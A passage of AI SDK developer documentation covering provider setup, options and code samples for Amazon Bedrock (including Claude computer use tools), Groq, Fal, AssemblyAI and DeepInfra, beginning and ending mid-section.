  date: 'Fri, 07 Feb 2025 04:28:30 GMT',
  'x-amzn-requestid': 'c9f3ace4-dd5d-49e5-9807-39aedfa47c8e'
}

This information is also available with streamText:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';

const result = streamText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}
console.log('Response headers:', (await result.response).headers);

With sample output as:

{
  connection: 'keep-alive',
  'content-type': 'application/vnd.amazon.eventstream',
  date: 'Fri, 07 Feb 2025 04:33:37 GMT',
  'transfer-encoding': 'chunked',
  'x-amzn-requestid': 'a976e3fc-0e45-4241-9954-b9bdd80ab407'
}

Bedrock Anthropic Provider Usage

For more information on Claude models available on Amazon Bedrock, see Claude on Amazon Bedrock.

Provider Instance

You can import the default provider instance bedrockAnthropic from @ai-sdk/amazon-bedrock/anthropic:

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';

If you need a customized setup, you can import createBedrockAnthropic from @ai-sdk/amazon-bedrock/anthropic and create a provider instance with your settings:

import { createBedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';

const bedrockAnthropic = createBedrockAnthropic({
  region: 'us-east-1', // optional
  accessKeyId: 'xxxxxxxxx', // optional
  secretAccessKey: 'xxxxxxxxx', // optional
  sessionToken: 'xxxxxxxxx', // optional
});

Provider Settings

You can use the following optional settings to customize the Bedrock Anthropic provider instance:

region string

The AWS region that you want to use for the API calls. It uses the AWS_REGION environment variable by default.
accessKeyId string

The AWS access key ID that you want to use for the API calls. It uses the AWS_ACCESS_KEY_ID environment variable by default.
secretAccessKey string

The AWS secret access key that you want to use for the API calls. It uses the AWS_SECRET_ACCESS_KEY environment variable by default.
sessionToken string

Optional. The AWS session token that you want to use for the API calls. It uses the AWS_SESSION_TOKEN environment variable by default.
apiKey string

API key for authenticating requests using Bearer token authentication. When provided, this will be used instead of AWS SigV4 authentication. It uses the AWS_BEARER_TOKEN_BEDROCK environment variable by default.
baseURL string

Base URL for the Bedrock API calls. Useful for custom endpoints or proxy configurations.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
credentialProvider () => PromiseLike<BedrockCredentials>

The AWS credential provider to use for the Bedrock provider to get dynamic credentials similar to the AWS SDK. Setting a provider here will cause its credential values to be used instead of the accessKeyId, secretAccessKey, and sessionToken settings.

Language Models

You can create models that call the Anthropic Messages API using the provider instance. The first argument is the model id, e.g. us.anthropic.claude-3-5-sonnet-20241022-v2:0.

const model = bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0');

You can use Bedrock Anthropic language models to generate text with the generateText function:

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Provider Options

The following optional provider options are available for Bedrock Anthropic models:

metadata object

Optional. Metadata to include with the request. See the Anthropic API documentation for details.
- userId string - An external identifier for the end-user.

Cache Control

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  messages: [
    {
      role: 'system',
      content: 'You are an expert assistant.',
      providerOptions: {
        anthropic: { cacheControl: { type: 'ephemeral' } },
      },
    },
    {
      role: 'user',
      content: 'Explain quantum computing.',
    },
  ],
});

Computer Use

The Bedrock Anthropic provider supports Anthropic's computer use tools:

Bash Tool: Allows running bash commands.
Text Editor Tool: Provides functionality for viewing and editing text files.
Computer Tool: Enables control of keyboard and mouse actions on a computer.

They are available via the tools property of the provider instance.

Bash Tool

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  tools: {
    bash: bedrockAnthropic.tools.bash_20241022({
      execute: async ({ command }) => {
        // Implement your bash command execution logic here
        return [{ type: 'text', text: `Executed: ${command}` }];
      },
    }),
  },
  prompt: 'List the files in my directory.',
  stopWhen: stepCountIs(2),
});

Text Editor Tool

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  tools: {
    str_replace_editor: bedrockAnthropic.tools.textEditor_20241022({
      execute: async ({ command, path, old_str, new_str, insert_text }) => {
        // Implement your text editing logic here
        return 'File updated successfully';
      },
    }),
  },
  prompt: 'Update my README file.',
  stopWhen: stepCountIs(5),
});

Computer Tool

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';
import fs from 'fs';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  tools: {
    computer: bedrockAnthropic.tools.computer_20241022({
      displayWidthPx: 1024,
      displayHeightPx: 768,
      execute: async ({ action, coordinate, text }) => {
        if (action === 'screenshot') {
          return {
            type: 'image',
            data: fs.readFileSync('./screenshot.png').toString('base64'),
          };
        }
        return `executed ${action}`;
      },
      toModelOutput({ output }) {
        return {
          type: 'content',
          value: [
            typeof output === 'string'
              ? { type: 'text', text: output }
              : {
                  type: 'image-data',
                  data: output.data,
                  mediaType: 'image/png',
                },
          ],
        };
      },
    }),
  },
  prompt: 'Take a screenshot.',
  stopWhen: stepCountIs(3),
});

Reasoning

Anthropic has reasoning support for Claude 3.7 and Claude 4 models on Bedrock, including:

us.anthropic.claude-opus-4-7
us.anthropic.claude-opus-4-6-v1
us.anthropic.claude-opus-4-5-20251101-v1:0
us.anthropic.claude-sonnet-4-5-20250929-v1:0
us.anthropic.claude-opus-4-20250514-v1:0
us.anthropic.claude-sonnet-4-20250514-v1:0
us.anthropic.claude-opus-4-1-20250805-v1:0
us.anthropic.claude-haiku-4-5-20251001-v1:0

You can enable it using the thinking provider option and specifying a thinking budget in tokens.

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    },
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Computer Use	Reasoning
`us.anthropic.claude-opus-4-7`
`us.anthropic.claude-opus-4-6-v1`
`us.anthropic.claude-opus-4-5-20251101-v1:0`
`us.anthropic.claude-sonnet-4-5-20250929-v1:0`
`us.anthropic.claude-opus-4-20250514-v1:0`
`us.anthropic.claude-sonnet-4-20250514-v1:0`
`us.anthropic.claude-opus-4-1-20250805-v1:0`
`us.anthropic.claude-haiku-4-5-20251001-v1:0`
`us.anthropic.claude-3-5-sonnet-20241022-v2:0`

Migrating to `@ai-sdk/amazon-bedrock` 2.x

The Amazon Bedrock provider was rewritten in version 2.x to remove the dependency on the @aws-sdk/client-bedrock-runtime package.

title: Groq description: Learn how to use Groq.

Groq Provider

The Groq provider contains language model support for the Groq API.

Setup

The Groq provider is available via the @ai-sdk/groq module. You can install it with

Provider Instance

You can import the default provider instance groq from @ai-sdk/groq:

import { groq } from '@ai-sdk/groq';

If you need a customized setup, you can import createGroq from @ai-sdk/groq and create a provider instance with your settings:

import { createGroq } from '@ai-sdk/groq';

const groq = createGroq({
  // custom settings
});

You can use the following optional settings to customize the Groq provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.groq.com/openai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the GROQ_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create Groq models using a provider instance. The first argument is the model id, e.g. gemma2-9b-it.

const model = groq('gemma2-9b-it');

Reasoning Models

import { groq, type GroqLanguageModelOptions } from '@ai-sdk/groq';
import { generateText } from 'ai';

const result = await generateText({
  model: groq('qwen/qwen3-32b'),
  providerOptions: {
    groq: {
      reasoningFormat: 'parsed',
      reasoningEffort: 'default',
      parallelToolCalls: true, // Enable parallel function calling (default: true)
      user: 'user-123', // Unique identifier for end-user (optional)
      serviceTier: 'flex', // Use flex tier for higher throughput (optional)
    } satisfies GroqLanguageModelOptions,
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

The following optional provider options are available for Groq language models:

reasoningFormat 'parsed' | 'raw' | 'hidden'

Controls how reasoning is exposed in the generated text. Only supported by reasoning models like qwen-qwq-32b and deepseek-r1-distill-* models.

For a complete list of reasoning models and their capabilities, see Groq's reasoning models documentation.
reasoningEffort 'low' | 'medium' | 'high' | 'none' | 'default'

Controls the level of effort the model will put into reasoning.
- qwen/qwen3-32b
  - Supported values:
    - none: Disable reasoning. The model will not use any reasoning tokens.
    - default: Enable reasoning.
- gpt-oss20b/gpt-oss120b
  - Supported values:
    - low: Use a low level of reasoning effort.
    - medium: Use a medium level of reasoning effort.
    - high: Use a high level of reasoning effort.
Defaults to default for qwen/qwen3-32b.
structuredOutputs boolean

Whether to use structured outputs.

Defaults to true.

When enabled, object generation will use the json_schema format instead of json_object format, providing more reliable structured outputs.
strictJsonSchema boolean

Whether to use strict JSON schema validation. When true, the model uses constrained decoding to guarantee schema compliance.

Defaults to true.

Only used when structuredOutputs is enabled and a schema is provided. See Groq's Structured Outputs documentation for details on strict mode limitations.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Defaults to true.
user string

A unique identifier representing your end-user, which can help with monitoring and abuse detection.
serviceTier 'on_demand' | 'performance' | 'flex' | 'auto'

Service tier for the request. Defaults to 'on_demand'.
- 'on_demand': Default tier with consistent performance and fairness
- 'performance': Prioritized tier for latency-sensitive workloads
- 'flex': Higher throughput tier (10x rate limits) optimized for workloads that can handle occasional request failures
- 'auto': Uses on_demand rate limits first, then falls back to flex tier if exceeded
For more details about service tiers and their benefits, see Groq's service tiers documentation.

Only Groq reasoning models support the reasoningFormat option.

Structured Outputs

Structured outputs are enabled by default for Groq models. You can disable them by setting the structuredOutputs option to false.

import { groq } from '@ai-sdk/groq';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: groq('moonshotai/kimi-k2-instruct-0905'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(z.string()),
        instructions: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a simple pasta recipe.',
});

console.log(JSON.stringify(result.output, null, 2));

You can disable structured outputs for models that don't support them:

import { groq, type GroqLanguageModelOptions } from '@ai-sdk/groq';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: groq('gemma2-9b-it'),
  providerOptions: {
    groq: {
      structuredOutputs: false,
    } satisfies GroqLanguageModelOptions,
  },
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(z.string()),
        instructions: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a simple pasta recipe in JSON format.',
});

console.log(JSON.stringify(result.output, null, 2));

Example

You can use Groq language models to generate text with the generateText function:

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';

const { text } = await generateText({
  model: groq('gemma2-9b-it'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Image Input

Groq's multi-modal models like meta-llama/llama-4-scout-17b-16e-instruct support image inputs. You can include images in your messages using either URLs or base64-encoded data:

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';

const { text } = await generateText({
  model: groq('meta-llama/llama-4-scout-17b-16e-instruct'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'What do you see in this image?' },
        {
          type: 'image',
          image: 'https://example.com/image.jpg',
        },
      ],
    },
  ],
});

You can also use base64-encoded images:

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
import { readFileSync } from 'fs';

const imageData = readFileSync('path/to/image.jpg', 'base64');

const { text } = await generateText({
  model: groq('meta-llama/llama-4-scout-17b-16e-instruct'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe this image in detail.' },
        {
          type: 'image',
          image: `data:image/jpeg;base64,${imageData}`,
        },
      ],
    },
  ],
});

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`gemma2-9b-it`
`llama-3.1-8b-instant`
`llama-3.3-70b-versatile`
`meta-llama/llama-guard-4-12b`
`deepseek-r1-distill-llama-70b`
`meta-llama/llama-4-maverick-17b-128e-instruct`
`meta-llama/llama-4-scout-17b-16e-instruct`
`meta-llama/llama-prompt-guard-2-22m`
`meta-llama/llama-prompt-guard-2-86m`
`moonshotai/kimi-k2-instruct-0905`
`qwen/qwen3-32b`
`llama-guard-3-8b`
`llama3-70b-8192`
`llama3-8b-8192`
`mixtral-8x7b-32768`
`qwen-qwq-32b`
`qwen-2.5-32b`
`deepseek-r1-distill-qwen-32b`
`openai/gpt-oss-20b`
`openai/gpt-oss-120b`

Browser Search Tool

Supported Models

Browser search is only available for these specific models:

openai/gpt-oss-20b
openai/gpt-oss-120b

Basic Usage

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';

const result = await generateText({
  model: groq('openai/gpt-oss-120b'), // Must use supported model
  prompt:
    'What are the latest developments in AI? Please search for recent news.',
  tools: {
    browser_search: groq.tools.browserSearch({}),
  },
  toolChoice: 'required', // Ensure the tool is used
});

console.log(result.text);

Streaming Example

import { groq } from '@ai-sdk/groq';
import { streamText } from 'ai';

const result = streamText({
  model: groq('openai/gpt-oss-120b'),
  prompt: 'Search for the latest tech news and summarize it.',
  tools: {
    browser_search: groq.tools.browserSearch({}),
  },
  toolChoice: 'required',
});

for await (const delta of result.fullStream) {
  if (delta.type === 'text-delta') {
    process.stdout.write(delta.text);
  }
}

Key Features

Interactive Browsing: Navigates websites like a human user
Comprehensive Results: More detailed than traditional search snippets
Server-side Execution: Runs on Groq's infrastructure, no setup required
Powered by Exa: Uses Exa search engine for optimal results
Currently Free: Available at no additional charge during beta

Best Practices

Use toolChoice: 'required' to ensure the browser search is activated
Only supported on openai/gpt-oss-20b and openai/gpt-oss-120b models
The tool works automatically - no configuration parameters needed
Server-side execution means no additional API keys or setup required

Model Validation

The provider automatically validates model compatibility:

// ✅ Supported - will work
const result = await generateText({
  model: groq('openai/gpt-oss-120b'),
  tools: { browser_search: groq.tools.browserSearch({}) },
});

// ❌ Unsupported - will show warning and ignore tool
const result = await generateText({
  model: groq('gemma2-9b-it'),
  tools: { browser_search: groq.tools.browserSearch({}) },
});
// Warning: "Browser search is only supported on models: openai/gpt-oss-20b, openai/gpt-oss-120b"

Transcription Models

You can create models that call the Groq transcription API using the .transcription() factory method.

The first argument is the model id e.g. whisper-large-v3.

const model = groq.transcription('whisper-large-v3');

import { experimental_transcribe as transcribe } from 'ai';
import { groq, type GroqTranscriptionModelOptions } from '@ai-sdk/groq';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: groq.transcription('whisper-large-v3'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    groq: { language: 'en' } satisfies GroqTranscriptionModelOptions,
  },
});

The following provider options are available:

timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency. Important: Requires responseFormat to be set to 'verbose_json'.
responseFormat string The format of the response. Set to 'verbose_json' to receive timestamps for audio segments and enable timestampGranularities. Set to 'text' to return only the transcribed text. Optional.
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper-large-v3`
`whisper-large-v3-turbo`

title: Fal description: Learn how to use Fal AI models with the AI SDK.

Fal Provider

Setup

The Fal provider is available via the @ai-sdk/fal module. You can install it with

Provider Instance

You can import the default provider instance fal from @ai-sdk/fal:

import { fal } from '@ai-sdk/fal';

If you need a customized setup, you can import createFal and create a provider instance with your settings:

import { createFal } from '@ai-sdk/fal';

const fal = createFal({
  apiKey: 'your-api-key', // optional, defaults to FAL_API_KEY environment variable, falling back to FAL_KEY
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Fal provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://fal.run.
apiKey string

API key that is being sent using the Authorization header. It defaults to the FAL_API_KEY environment variable, falling back to FAL_KEY.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Image Models

You can create Fal image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { fal } from '@ai-sdk/fal';
import { generateImage } from 'ai';
import fs from 'fs';

const { image, providerMetadata } = await generateImage({
  model: fal.image('fal-ai/flux/dev'),
  prompt: 'A serene mountain landscape at sunset',
});

const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Fal image models may return additional information for the images and the request.

Here are some examples of properties that may be set for each image

providerMetadata.fal.images[0].nsfw; // boolean, image is not safe for work
providerMetadata.fal.images[0].width; // number, image width
providerMetadata.fal.images[0].height; // number, image height
providerMetadata.fal.images[0].contentType; // string, mime type of the image

Model Capabilities

Fal offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Fal AI Search Page.

Model	Description
`fal-ai/flux/dev`	FLUX.1 [dev] model for high-quality image generation
`fal-ai/flux-pro/kontext`	FLUX.1 Kontext [pro] handles both text and reference images as inputs, enabling targeted edits and complex transformations
`fal-ai/flux-pro/kontext/max`	FLUX.1 Kontext [max] with improved prompt adherence and typography generation
`fal-ai/flux-lora`	Super fast endpoint for FLUX.1 with LoRA support
`fal-ai/ideogram/character`	Generate consistent character appearances across multiple images. Maintain facial features, proportions, and distinctive traits
`fal-ai/qwen-image`	Qwen-Image foundation model with significant advances in complex text rendering and precise image editing
`fal-ai/omnigen-v2`	Unified image generation model for Image Editing, Personalized Image Generation, Virtual Try-On, Multi Person Generation and more
`fal-ai/bytedance/dreamina/v3.1/text-to-image`	Dreamina showcases superior picture effects with improvements in aesthetics, precise and diverse styles, and rich details
`fal-ai/recraft/v3/text-to-image`	SOTA in image generation with vector art and brand style capabilities
`fal-ai/wan/v2.2-a14b/text-to-image`	High-resolution, photorealistic images with fine-grained detail

Fal models support the following aspect ratios:

1:1 (square HD)
16:9 (landscape)
9:16 (portrait)
4:3 (landscape)
3:4 (portrait)
16:10 (1280x800)
10:16 (800x1280)
21:9 (2560x1080)
9:21 (1080x2560)

Key features of Fal models include:

Up to 4x faster inference speeds compared to alternatives
Optimized by the Fal Inference Engine™
Support for real-time infrastructure
Cost-effective scaling with pay-per-use pricing
LoRA training capabilities for model personalization

Modify Image

Transform existing images using text prompts.

await generateImage({
  model: fal.image('fal-ai/flux-pro/kontext/max'),
  prompt: {
    text: 'Put a donut next to the flour.',
    images: [
      'https://v3.fal.media/files/rabbit/rmgBxhwGYb2d3pl3x9sKf_output.png',
    ],
  },
});

Images can also be passed as base64-encoded string, a Uint8Array, an ArrayBuffer, or a Buffer. A mask can be passed as well

await generateImage({
  model: fal.image('fal-ai/flux-pro/kontext/max'),
  prompt: {
    text: 'Put a donut next to the flour.',
    images: [imageBuffer],
    mask: maskBuffer,
  },
});

Provider Options

Fal image models support flexible provider options through the providerOptions.fal object. You can pass any parameters supported by the specific Fal model's API. Common options include:

imageUrl - Reference image URL for image-to-image generation (deprecated, use prompt.images instead)
strength - Controls how much the output differs from the input image
guidanceScale - Controls adherence to the prompt (range: 1-20)
numInferenceSteps - Number of denoising steps (range: 1-50)
enableSafetyChecker - Enable/disable safety filtering
outputFormat - Output format: 'jpeg' or 'png'
syncMode - Wait for completion before returning response
acceleration - Speed of generation: 'none', 'regular', or 'high'
safetyTolerance - Content safety filtering level (1-6, where 1 is strictest)
useMultipleImages - When true, converts multiple input images to image_urls array for models that support multiple images (e.g., fal-ai/flux-2/edit)

Refer to the Fal AI model documentation for model-specific parameters.

Advanced Features

Fal's platform offers several advanced capabilities:

Private Model Inference: Run your own diffusion transformer models with up to 50% faster inference
LoRA Training: Train and personalize models in under 5 minutes
Real-time Infrastructure: Enable new user experiences with fast inference times
Scalable Architecture: Scale to thousands of GPUs when needed

For more details about Fal's capabilities and features, visit the Fal AI documentation.

Transcription Models

You can create models that call the Fal transcription API using the .transcription() factory method.

The first argument is the model id without the fal-ai/ prefix e.g. wizper.

const model = fal.transcription('wizper');

import { experimental_transcribe as transcribe } from 'ai';
import { fal, type FalTranscriptionModelOptions } from '@ai-sdk/fal';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: fal.transcription('wizper'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    fal: { batchSize: 10 } satisfies FalTranscriptionModelOptions,
  },
});

The following provider options are available:

language string Language of the audio file. Defaults to 'en'. If set to null, the language will be automatically detected. Accepts ISO language codes like 'en', 'fr', 'zh', etc. Optional.
diarize boolean Whether to diarize the audio file (identify different speakers). Defaults to true. Optional.
chunkLevel string Level of the chunks to return. Either 'segment' or 'word'. Default value: "segment" Optional.
version string Version of the model to use. All models are Whisper large variants. Default value: "3" Optional.
batchSize number Batch size for processing. Default value: 64 Optional.
numSpeakers number Number of speakers in the audio file. If not provided, the number of speakers will be automatically detected. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper`
`wizper`

Speech Models

You can create models that call Fal text-to-speech endpoints using the .speech() factory method.

Basic Usage

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { fal } from '@ai-sdk/fal';

const result = await generateSpeech({
  model: fal.speech('fal-ai/minimax/speech-02-hd'),
  text: 'Hello from the AI SDK!',
});

Model Capabilities

Model	Description
`fal-ai/minimax/voice-clone`	Clone a voice from a sample audio and generate speech from text prompts
`fal-ai/minimax/voice-design`	Design a personalized voice from a text description and generate speech from text prompts
`fal-ai/dia-tts/voice-clone`	Clone dialog voices from a sample audio and generate dialogs from text prompts
`fal-ai/minimax/speech-02-hd`	Generate speech from text prompts and different voices
`fal-ai/minimax/speech-02-turbo`	Generate fast speech from text prompts and different voices
`fal-ai/dia-tts`	Directly generates realistic dialogue from transcripts with audio conditioning for emotion control. Produces natural nonverbals like laughter and throat clearing
`resemble-ai/chatterboxhd/text-to-speech`	Generate expressive, natural speech with Resemble AI's Chatterbox. Features unique emotion control, instant voice cloning from short audio, and built-in watermarking

Provider Options

Pass provider-specific options via providerOptions.fal depending on the model:

voice_setting object
- voice_id (string): predefined voice ID
- speed (number): 0.5–2.0
- vol (number): 0–10
- pitch (number): -12–12
- emotion (enum): happy | sad | angry | fearful | disgusted | surprised | neutral
- english_normalization (boolean)
audio_setting object Audio configuration settings specific to the model.
language_boost enum Chinese | Chinese,Yue | English | Arabic | Russian | Spanish | French | Portuguese | German | Turkish | Dutch | Ukrainian | Vietnamese | Indonesian | Japanese | Italian | Korean | Thai | Polish | Romanian | Greek | Czech | Finnish | Hindi | auto
pronunciation_dict object Custom pronunciation dictionary for specific words.

Model-specific parameters (e.g., audio_url, prompt, preview_text, ref_audio_url, ref_text) can be passed directly under providerOptions.fal and will be forwarded to the Fal API.

title: AssemblyAI description: Learn how to use the AssemblyAI provider for the AI SDK.

AssemblyAI Provider

The AssemblyAI provider contains language model support for the AssemblyAI transcription API.

Setup

The AssemblyAI provider is available in the @ai-sdk/assemblyai module. You can install it with

Provider Instance

You can import the default provider instance assemblyai from @ai-sdk/assemblyai:

import { assemblyai } from '@ai-sdk/assemblyai';

If you need a customized setup, you can import createAssemblyAI from @ai-sdk/assemblyai and create a provider instance with your settings:

import { createAssemblyAI } from '@ai-sdk/assemblyai';

const assemblyai = createAssemblyAI({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the AssemblyAI provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the ASSEMBLYAI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the AssemblyAI transcription API using the .transcription() factory method.

The first argument is the model id e.g. best.

const model = assemblyai.transcription('best');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the contentSafety option will enable content safety filtering.

import { experimental_transcribe as transcribe } from 'ai';
import { assemblyai } from '@ai-sdk/assemblyai';
import { type AssemblyAITranscriptionModelOptions } from '@ai-sdk/assemblyai';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: assemblyai.transcription('best'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    assemblyai: {
      contentSafety: true,
    } satisfies AssemblyAITranscriptionModelOptions,
  },
});

The following provider options are available:

audioEndAt number

End time of the audio in milliseconds. Optional.
audioStartFrom number

Start time of the audio in milliseconds. Optional.
autoChapters boolean

Whether to automatically generate chapters for the transcription. Optional.
autoHighlights boolean

Whether to automatically generate highlights for the transcription. Optional.
boostParam enum

Boost parameter for the transcription. Allowed values: 'low', 'default', 'high'. Optional.
contentSafety boolean

Whether to enable content safety filtering. Optional.
contentSafetyConfidence number

Confidence threshold for content safety filtering (25-100). Optional.
customSpelling array of objects

Custom spelling rules for the transcription. Each object has from (array of strings) and to (string) properties. Optional.
disfluencies boolean

Whether to include disfluencies (um, uh, etc.) in the transcription. Optional.
entityDetection boolean

Whether to detect entities in the transcription. Optional.
filterProfanity boolean

Whether to filter profanity in the transcription. Optional.
formatText boolean

Whether to format the text in the transcription. Optional.
iabCategories boolean

Whether to include IAB categories in the transcription. Optional.
languageCode string

Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
languageConfidenceThreshold number

Confidence threshold for language detection. Optional.
languageDetection boolean

Whether to enable language detection. Optional.
multichannel boolean

Whether to process multiple audio channels separately. Optional.
punctuate boolean

Whether to add punctuation to the transcription. Optional.
redactPii boolean

Whether to redact personally identifiable information. Optional.
redactPiiAudio boolean

Whether to redact PII in the audio file. Optional.
redactPiiAudioQuality enum

Quality of the redacted audio file. Allowed values: 'mp3', 'wav'. Optional.
redactPiiPolicies array of enums

Policies for PII redaction, specifying which types of information to redact. Supports numerous types like 'person_name', 'phone_number', etc. Optional.
redactPiiSub enum

Substitution method for redacted PII. Allowed values: 'entity_name', 'hash'. Optional.
sentimentAnalysis boolean

Whether to perform sentiment analysis on the transcription. Optional.
speakerLabels boolean

Whether to label different speakers in the transcription. Optional.
speakersExpected number

Expected number of speakers in the audio. Optional.
speechThreshold number

Threshold for speech detection (0-1). Optional.
summarization boolean

Whether to generate a summary of the transcription. Optional.
summaryModel enum

Model to use for summarization. Allowed values: 'informative', 'conversational', 'catchy'. Optional.
summaryType enum

Type of summary to generate. Allowed values: 'bullets', 'bullets_verbose', 'gist', 'headline', 'paragraph'. Optional.
webhookAuthHeaderName string

Name of the authentication header for webhook requests. Optional.
webhookAuthHeaderValue string

Value of the authentication header for webhook requests. Optional.
webhookUrl string

URL to send webhook notifications to. Optional.
wordBoost array of strings

List of words to boost in the transcription. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`best`
`nano`

title: DeepInfra description: Learn how to use DeepInfra's models with the AI SDK.

DeepInfra Provider

The DeepInfra provider contains support for state-of-the-art models through the DeepInfra API, including Llama 3, Mixtral, Qwen, and many other popular open-source models.

Setup

The DeepInfra provider is available via the @ai-sdk/deepinfra module. You can install it with:

Provider Instance

You can import the default provider instance deepinfra from @ai-sdk/deepinfra:

import { deepinfra } from '@ai-sdk/deepinfra';

If you need a customized setup, you can import createDeepInfra from @ai-sdk/deepinfra and create a provider instance with your settings:

import { createDeepInfra } from '@ai-sdk/deepinfra';

const deepinfra = createDeepInfra({
  apiKey: process.env.DEEPINFRA_API_KEY ?? '',
});

You can use the following optional settings to customize the DeepInfra provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.deepinfra.com/v1.

Note: Language models and embeddings use OpenAI-compatible endpoints at {baseURL}/openai, while image models use {baseURL}/inference.
apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPINFRA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create language models using a provider instance. The first argument is the model ID, for example:

import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';

